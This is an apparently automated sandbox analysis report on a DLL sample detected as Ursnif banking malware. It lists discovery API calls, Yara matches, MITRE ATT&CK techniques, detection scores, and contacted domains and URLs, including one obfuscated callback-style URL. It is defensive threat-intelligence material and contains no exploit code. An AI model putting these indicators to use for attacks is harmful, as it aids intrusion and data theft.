Source: regsvr32.exe, 00000001.00000002.1027826618.0000000002DE0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00BA5DC6 cpuid

1_2_00BA5DC6

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00381266 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_00381266

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00BA5DC6 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_00BA5DC6

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00381799 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_00381799

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.729247214.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729212417.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729069963.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729161495.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1028497045.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729268110.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729280419.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729190744.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729230309.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6940, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.729247214.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729212417.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729069963.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729161495.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1028497045.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729268110.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729280419.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729190744.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729230309.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6940, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion1	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
f0t0s.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.regsvr32.exe.380000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen8		Download File
1.2.regsvr32.exe.ba0000.4.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

Source	Detection	Scanner	Label	Link
tls13.taboola.map.fastly.net	0%	Virustotal		Browse
ocsp.sca1b.amazontrust.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://www.remixd.com/privacy_policy.html	0%	URL Reputation	safe
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://www.gadsme.com/privacy-policy/	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://www.admo.tv/en/privacy-policy	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://listonic.com/privacy/	0%	URL Reputation	safe
https://listonic.com/privacy/	0%	URL Reputation	safe
https://listonic.com/privacy/	0%	URL Reputation	safe
http://ocsp.sca1b.amazontrust.com/images/UX6NBxejGKuiww/O5lNkgT6UNtIOi_2F9bva/Qprmk34fIbO879qt/MdtrogqLmF_2Fqf/_2FF2F05EKst9Z1EEw/f4caZYYsT/SAZrEW2lvj_2BEojoTxU/tDJE5vtOctKZ_2FKqji/N5plaj5Qq3lxm6IFqAOkT_/2FkRoPIQCjapM/McWFMQds/m87yGEYxK6DYnqXLcn6Sf84/1Yi_2FiH.avi	0%	Avira URL Cloud	safe
https://quantyoo.de/datenschutz	0%	URL Reputation	safe
https://quantyoo.de/datenschutz	0%	URL Reputation	safe
https://quantyoo.de/datenschutz	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf	0%	URL Reputation	safe
https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf	0%	URL Reputation	safe
https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf	0%	URL Reputation	safe
https://related.hu/adatkezeles/	0%	URL Reputation	safe
https://related.hu/adatkezeles/	0%	URL Reputation	safe
https://related.hu/adatkezeles/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	104.76.200.23	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
ocsp.sca1b.amazontrust.com	143.204.214.141	true	false	0%, Virustotal, Browse	unknown
hblg.media.net	104.76.200.23	true	false		high
lg3.media.net	104.76.200.23	true	false		high
web.vortex.data.msn.com	unknown	unknown	false		high
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	false		unknown
cvision.media.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ocsp.sca1b.amazontrust.com/images/UX6NBxejGKuiww/O5lNkgT6UNtIOi_2F9bva/Qprmk34fIbO879qt/MdtrogqLmF_2Fqf/_2FF2F05EKst9Z1EEw/f4caZYYsT/SAZrEW2lvj_2BEojoTxU/tDJE5vtOctKZ_2FKqji/N5plaj5Qq3lxm6IFqAOkT_/2FkRoPIQCjapM/McWFMQds/m87yGEYxK6DYnqXLcn6Sf84/1Yi_2FiH.avi	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.msn.com/de-ch/news/other/stadtpr%c3%a4sidentin-corine-mauch-r%c3%a4umt-mitschuld-des-sta	de-ch[1].htm.4.dr	false		high
http://searchads.msn.net/.cfm?&&kp=1&	{49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.4.dr	false		high
https://www.remixd.com/privacy_policy.html	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com;Fotos	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
http://www.symantec.com	f0t0s.dll	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/judenhass-kampfsport-und-waffen-f%c3%bcr-den-rassenkrieg-wie-si	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/ein-werbespot-f%c3%bcrs-entsorgungsamt-der-schlecht-ankommt/ar-	de-ch[1].htm.4.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	{49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://web.vortex.data.msn.com/collect/v1	de-ch[1].htm.4.dr	false		high
https://www.skype.com/	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/aargau-schickt-mittel-und-berufssch%c3%bcler-in-fernunterricht/	de-ch[1].htm.4.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/er-will-%c3%bcberrascht-werden-am-liebsten-von-sich-selber/ar-B	de-ch[1].htm.4.dr	false		high
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.4.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://client-s.gateway.messenger.live.com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.brightcom.com/privacy-policy/	iab2Data[1].json.4.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	{49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.4.dr	false		high
https://bealion.com/politica-de-cookies	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692&epi=de-ch	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch	de-ch[1].htm.4.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.4.dr	false		high
https://twitter.com/i/notifications;Ich	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.4.dr	false		high
https://www.gadsme.com/privacy-policy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.4.dr	false		high
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.4.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.4.dr	false		high
https://docs.prebid.org/privacy.html	iab2Data[1].json.4.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.skype.com/de	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.4.dr	false		high
https://www.skype.com/de/download-skype	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.4.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://channelpilot.co.uk/privacy-policy	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.4.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/news/other/kopf-der-winterthurer-eisenjugend-verhaftet/ar-BB1cVDBd?ocid=hp	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.admo.tv/en/privacy-policy	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath	iab2Data[1].json.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://outlook.com/	de-ch[1].htm.4.dr	false		high
https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	{49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	{49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/80-k%c3%a4lber-aus-brennendem-stall-evakuiert/ar-BB1cVbsV?ocid=	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/modules/fetch"	de-ch[1].htm.4.dr	false		high
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	de-ch[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.4.dr	false		high
https://www.bidstack.com/privacy-policy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/en/download/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://popup.taboola.com/german	auction[1].htm.4.dr	false		high
https://listonic.com/privacy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/sexuelle-%c3%bcbergriffe-bei-medizinischer-massage/ar-BB1cW8f7?	de-ch[1].htm.4.dr	false		high
https://twitter.com/	de-ch[1].htm.4.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de	de-ch[1].htm.4.dr	false		high
https://quantyoo.de/datenschutz	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.live.com/calendar	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	auction[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/#qt=mru	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap	auction[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/z%c3%bcrich-erh%c3%a4lt-zwei-kulturdirektorinnen/ar-BB1cVvSE?oc	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/bus-mit-eis-und-schnee-beworfen-jugendliche-festgenommen/ar-BB1	de-ch[1].htm.4.dr	false		high
https://www.msn.com?form=MY01O4&OCID=MY01O4	de-ch[1].htm.4.dr	false		high
https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://support.skype.com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1	{49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http	de-ch[1].htm.4.dr	false		high
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm	de-ch[1].htm.4.dr	false		high
https://related.hu/adatkezeles/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
143.204.214.141	unknown	United States		16509	AMAZON-02US	false
151.101.1.44	unknown	United States		54113	FASTLYUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	342512
Start date:	21.01.2021
Start time:	08:13:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	f0t0s.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.troj.winDLL@13/129@9/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 56% (good quality ratio 53.1%) Quality average: 79.2% Quality standard deviation: 28.6%
HCA Information:	Successful, ratio: 62% Number of executed functions: 36 Number of non-executed functions: 40
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, wermgr.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 88.221.62.148, 204.79.197.203, 204.79.197.200, 13.107.21.200, 92.122.213.231, 92.122.213.187, 65.55.44.109, 104.76.200.23, 52.255.188.83, 13.88.21.125, 51.104.144.132, 92.122.213.247, 92.122.213.194, 152.199.19.161, 104.43.193.48, 2.20.142.209, 2.20.142.210, 52.155.217.156, 20.54.26.129, 104.42.151.234, 40.126.31.137, 40.126.31.1, 40.126.31.135, 40.126.31.143, 40.126.31.4, 40.126.31.6, 40.126.31.141, 20.190.159.132 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, global.vortex.data.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, a767.dscg3.akamai.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, login.msa.msidentity.com, web.vortex.data.microsoft.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, dub2.current.a.prd.aadg.trafficmanager.net, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, static-global-s-msn-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net, www.tm.lg.prod.aadmsa.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
151.101.1.44	http://s3-eu-west-1.amazonaws.com/hjdpjni/ogbim#qs=r-acacaeeikdgeadkieeefjaehbihabababaefahcaccajbiackdcagfkbkacb	Get hash	malicious	Browse	cdn.taboola.com/libtrc/w4llc-network/loader.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ocsp.sca1b.amazontrust.com	p1cture3.dll	Get hash	malicious	Browse	65.9.70.182
	p1cture3jpg.dll	Get hash	malicious	Browse	65.9.70.13
	ph0t0.jpg.dll	Get hash	malicious	Browse	143.204.15.36
	ph0t0.dll	Get hash	malicious	Browse	143.204.15.47
	statis1c.dll	Get hash	malicious	Browse	65.9.94.80
	statis1c.dll	Get hash	malicious	Browse	65.9.70.182
	con3cti0n.dll	Get hash	malicious	Browse	65.9.77.71
	con3cti0n.dll	Get hash	malicious	Browse	143.204.214.74
	opzi0n1[1].dll	Get hash	malicious	Browse	13.224.89.96
	con3cti0n.dll	Get hash	malicious	Browse	13.224.195.167
	c0nnect1on.dll	Get hash	malicious	Browse	13.224.89.213
	c0nnect1on.dll	Get hash	malicious	Browse	65.9.70.13
	c0nnect1on.dll	Get hash	malicious	Browse	13.224.89.96
	c0nnect1on.dll	Get hash	malicious	Browse	13.224.89.175
	0pz1on1.dll	Get hash	malicious	Browse	143.204.15.36
	0pz1on1.dll	Get hash	malicious	Browse	143.204.15.203
	0pz1on1.dll	Get hash	malicious	Browse	54.230.104.94
	opzi0n1.dll	Get hash	malicious	Browse	13.224.89.175
	H5MmXCKkB1.exe	Get hash	malicious	Browse	65.9.23.43
	new-awsd.exe	Get hash	malicious	Browse	13.224.89.194
tls13.taboola.map.fastly.net	TMIJM.cpl	Get hash	malicious	Browse	151.101.1.44
